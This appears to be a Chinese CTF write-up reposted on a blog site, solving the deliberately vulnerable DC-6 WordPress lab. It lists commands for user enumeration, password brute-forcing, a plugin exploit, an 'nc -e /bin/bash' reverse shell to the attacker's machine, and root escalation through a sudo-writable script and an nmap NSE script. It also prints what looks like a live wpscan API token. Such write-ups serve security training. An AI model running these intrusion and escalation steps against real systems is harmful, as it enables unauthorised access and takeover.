DC-6靶机做题记录

这篇具有很好参考价值的文章主要介绍了DC-6靶机做题记录。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

靶机下载地址:

链接:https://pan.baidu.com/s/1-tP_hOz4gBkd_CvlvhcfSg?pwd=oufe 
提取码:oufe 

参考:

  • DC6靶场介绍:https://www.vulnhub.com/entry/dc-6,315/
  • 靶机:http://www.five86.com/downloads/DC-6.zip
  • DC-6 (1).pdf
  • https://wpscan.com/
  • 【网安神器篇】——WPScan漏洞扫描工具-CSDN博客
  • ChatGPT
  • 【DC系列靶机DC6通关讲解】 https://www.bilibili.com/video/BV1eA411U7ox/?share_source=copy_web&vd_source=12088c39299ad03109d9a21304b34fef

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
描述:

DESCRIPTION 说明
DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
DC-6是另一个专门建造的易受攻击实验室,旨在获得渗透测试领域的经验。

This isn't an overly difficult challenge so should be great for beginners.
这不是一个过于困难的挑战,所以对初学者来说应该很好。

The ultimate goal of this challenge is to get root and to read the one and only flag.
这个挑战的最终目标是扎根并阅读唯一的旗帜。

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Linux技能和熟悉Linux命令行是必须的,有一些基本渗透测试工具的经验也是必须的。

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7上向我推特寻求帮助,让你重新开始。但请注意:我不会给你答案,相反,我会给你一个如何前进的想法。

TECHNICAL INFORMATION 技术信息
DC-6 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.
DC-6是一个基于Debian 64位构建的VirtualBox虚拟机,但在大多数电脑上运行它应该不会有任何问题。

I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.
我已经在VMWare Player上测试过了,但如果在VMWare中运行此VM有任何问题,请仔细阅读。

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
它目前已配置为桥接网络,但可以根据您的要求进行更改。已为DHCP配置网络。

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.
安装很简单——下载它,解压缩它,然后将它导入VirtualBox或VMWare,然后就可以离开了。

NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:
注意:您需要在您的pentesting设备上编辑主机文件,以便其内容如下:

192.168.0.142 wordy

NOTE: I've used 192.168.0.142 as an example. You'll need to use your normal method to determine the IP address of the VM, and adapt accordingly.
注意:我使用了192.168.0.142作为示例。您需要使用常规方法来确定虚拟机的IP地址,并进行相应的调整。

This is VERY important.
这一点非常重要。

And yes, it's another WordPress based VM (although only my second one).
是的,这是另一个基于WordPress的虚拟机(尽管这只是我的第二个)。

1、导入VMware虚拟机

下载完成后,得到DC-6.ova文件,导入到VMware后,设置靶机和kali的网络连接模式为NAT模式,靶机会自动获取ip地址。

2、拍摄快照,防止后面出问题,有快照还能恢复到初始设置
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全3、kali创建一个目录 dc6 ,后续的操作都在该目录下进行
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全

使用工具
攻击者:kali 192.168.1.128
靶机:dc-3 192.168.1.134

一.信息收集

基础信息查询

0x01 查看存活主机 0x02 查看开放端口 和 0x03 查看端口服务

这几条命令的用法可以看之前的博客,这里不再赘述
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
发现靶机IP192.168.1.134
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
开放了80端口和22端口
访问80端口的网站会跳转到wordy
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
根据作者提示说明要修改hosts文件
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
那我们就在kali上面改

vim /etc/hosts

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
再次访问便好了
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
然后扫一下目录,找后台登录界面,如果对WordPress熟悉的话就知道在wp-admin目录下

dirsearch -u "http://192.168.1.134/" -e php

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
接下来使用 wpscan 这个工具


WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。
参考博客:【网安神器篇】——WPScan漏洞扫描工具-CSDN博客


先进行模糊扫描,但是它说要Token才能详细显示,直接去官网注册一个账号,获得Token

wpscan --url http://wordy/ 

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
带上token再扫描一遍

wpscan --url http://wordy/ --api-token G4Y3n07qz9016IA8KITk4G27VYhIHilxb0FWYDfiwms

就能够扫出来很多带红色感叹号的漏洞
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
然后枚举用户名,看看有哪些用户

wpscan --url http://wordy/ --api-token G4Y3n07qz9016IA8KITk4G27VYhIHilxb0FWYDfiwms --enumerate u

发现5个账号
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
将用户名保存为一个user.txt,得会进行爆破时要用
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
然后靶场官网提示了密码字典
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

用这条命令把字典保存下来
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
然后直接进行暴力破解

wpscan --url http://wordy  -P passwords.txt -U  user.txt

获得mark的密码helpdesk01
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
直接登录
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
发现插件Activity monitor有漏洞可以利用
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
查找该插件的历史漏洞

searchsploit activity monitor

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
发现有两个可以利用

第一个方法45274.html

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
查看发现是进行反弹shell 的,就是POST发送数据给靶机的网站
我们要修改这个POC的两个地方

  1. IP地址localhost:8000改为wordy
  2. 它的nc指令换成我们熟悉的,把nc -nlvp 127.0.0.1 9999 -e /bin/bash改为nc -e /bin/bash 192.168.1.128 1234

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
在当前目录开启http服务,用来运行脚本

python -m http.server 80

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
当我们点击按钮的时候,页面的 JavaScript 代码就会执行,向目标网站发送POST数据,以达到反弹shell的目的
我们首先在kali监听端口,然后再点击按钮

nc -lvvnp 1234

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
然后便可以看到shell弹过来了
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全

第二个方法50110.py

先把它下载到当前目录

searchsploit -m php/webapps/50110.py

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
直接运行
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
由于这个shell 不稳定,换个目录就掉了,所以我们再把它反弹到kali的另外一个终端上

nc -lvvnp 1234

nc -e /bin/bash 192.168.1.128 1234

1、
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
2、
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
然后改善一下shell

python -c "import pty;pty.spawn('/bin/bash')"

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
在home目录发现四个用户,只有 jens 和 mark 有东西
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
进入Mark的stuff目录查看文件,发现了 graham 的密码
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
直接切换为 graham 用户

su - graham

然后sudo -l查询当前用户可以使用sudo执行的命令
graham 发现有 sudo 位,⽂件是: /home/jens/backups.sh
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
发现它可以以 jens 的身份不用密码来执行 /home/jens/backups.sh 脚本文件

查看 graham 权限,发现所属 devs 组,可任意操作 backups.sh ⽂件:
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全

尝试写入/bin/bash,直接免密码切换到 jens 用户

echo "/bin/bash" >> backups.sh

sudo -u jens ./backups.sh

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全
在继续sudo -l查询当前用户可以使用sudo执行的命令
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全

nmap 提权

原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root

echo 'os.execute("/bin/bash")' > a.nse 
#创建一个 a.nse 的文件,并且写入 os.execute("/bin/bash")

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全

sudo -u root nmap --script=a.nse   #以root用户执行 nmap

–script: 指定自己的脚本文件
DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全

获得root权限

DC-6靶机做题记录,CTF,web安全,安全,网络,笔记,网络安全文章来源地址https://www.toymoban.com/news/detail-816772.html

总结知识点

  1. hosts文件域名解析
  2. 对WordPress的了解程度,比如后台是wp-admin,还有一个readme.html
  3. WordPress的扫描器叫wpscan,以及wpscan的用法,可以百度
  4. 要会爆破它的用户名和密码,可以用BurpSuite或者wpscan去爆破,也可以用hydra或者其他的一些方式
  5. 进入后台找寻一个能写php代码的地方,把shell弹回来
  6. 找到一个插件的漏洞,然后用它来反弹shell
  7. namp提权,用nse脚本提权

完毕!

到了这里,关于DC-6靶机做题记录的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Web 学习笔记 - 网络安全

    目录 m前言 正文 XSS 攻击 简单示例 XSS 防御 CSRF  Web 安全方面的基本知识是有很必要的,未必就要深入理解。本文主要介绍常见的网络攻击类型,不作深入探讨。 网络攻击的形式种类繁多,从简单的网站敏感文件扫描、弱口令暴力破解,到 SQL 注入,再到复杂的网络劫持等,

    2023年04月24日
    浏览(36)
  • 网络渗透CTF实践:获取靶机Web Developer 文件/root/flag.txt中flag

    实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统

    2024年01月23日
    浏览(32)
  • 网络安全B模块(笔记详解)- Web信息收集

    1.通过Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,查看该命令的完整帮助文件),并将该操作使用命令中固定不变的字符串作为Flag提交; Flag:nikto -H 2.通过Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,扫描目标服务器8080端口,检测其开放状态),

    2024年01月20日
    浏览(45)
  • 网络安全B模块(笔记详解)- Web渗透测试

    1.通过渗透机Kali1.0对服务器场景PYsystem20192进行Web渗透测试(使用工具w3af的对目标Web服务器进行审计),在w3af的命令行界面下,使用命令列出所有用于审计的插件,将该操作使用的命令作为Flag值提交; 进入kali命令控制台中使用命令w3af_console进入w3af命令行模式,通过输入命令

    2024年01月25日
    浏览(40)
  • DC-3靶机刷题记录

    靶机下载地址: 参考: https://www.vulnhub.com/entry/dc-32,312/ 官网 DC-3 (1).pdf https://c3ting.com/archives/vulnhnbshua-ti—dc-3 【【基础向】超详解vulnhub靶场DC-3-一靶多打】 https://www.bilibili.com/video/BV11a411d78T/?share_source=copy_webvd_source=12088c39299ad03109d9a21304b34fef ChatGPT 当出现DE 设备 (磁盘/CD-ROM)配置不

    2024年01月20日
    浏览(33)
  • DC-4靶机刷题记录

    靶机下载地址: 参考: 【【基础向】超详解vulnhub靶场DC-4-爆破+反弹shell+信息收集】 https://www.bilibili.com/video/BV1Le4y1o7Sx/?share_source=copy_webvd_source=12088c39299ad03109d9a21304b34fef http://t.yssmx.com/BOGVr http://t.yssmx.com/tRrgh DC-4 (1).pdf https://c3ting.com/archives/vulnhnbshua-ti-dc-4 https://www.vulnhub.com/entr

    2024年01月20日
    浏览(27)
  • CTF网络安全大赛详情

    网络安全已成为现代社会的一个关键挑战,随着互联网技术的飞速发展,从个人隐私保护到国家安全,网络安全的重要性日益突显。为了应对这一挑战,CTF(Capture The Flag,中文:夺旗赛)应运而生,成为全球网络安全领域中一种非常流行的信息安全竞赛形式。 CTF赛事起源与

    2024年04月26日
    浏览(58)
  • CTF网络安全大赛介绍

    CTF竞赛模式分为以下三类: 一、解题模式(Jeopardy)在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏

    2024年02月13日
    浏览(34)
  • 网络安全CTF工具合集

    各种在线工具以及工具整合 CTF资源库|CTF工具下载|CTF工具包|CTF工具集合 逆向工程: GDB – http://www.gnu.org/software/gdb/download/ IDA Pro – Download center Immunity Debugger – http://debugger.immunityinc.com/ OllyDbg – OllyDbg v1.10 radare2 – radare Hopper – Hopper - Download nm – unix/linux tool objdump – lin

    2024年02月06日
    浏览(34)
  • 网络安全、夺旗赛(CTF)技能汇总_ctf夺旗赛

    本文综合博主参赛准备经历,总结介绍了过程中了解的网络安全、夺旗赛(CTF)相关知识及资源,分为资料篇、工具篇、解题思路篇。 资料篇 CTF Wiki 对CTF整体介绍,各个方向的介绍,有例题,入门必备。 CTF工具集合 集成了工具资源,方便下载。 如果你对网络安全入门感兴

    2024年02月07日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包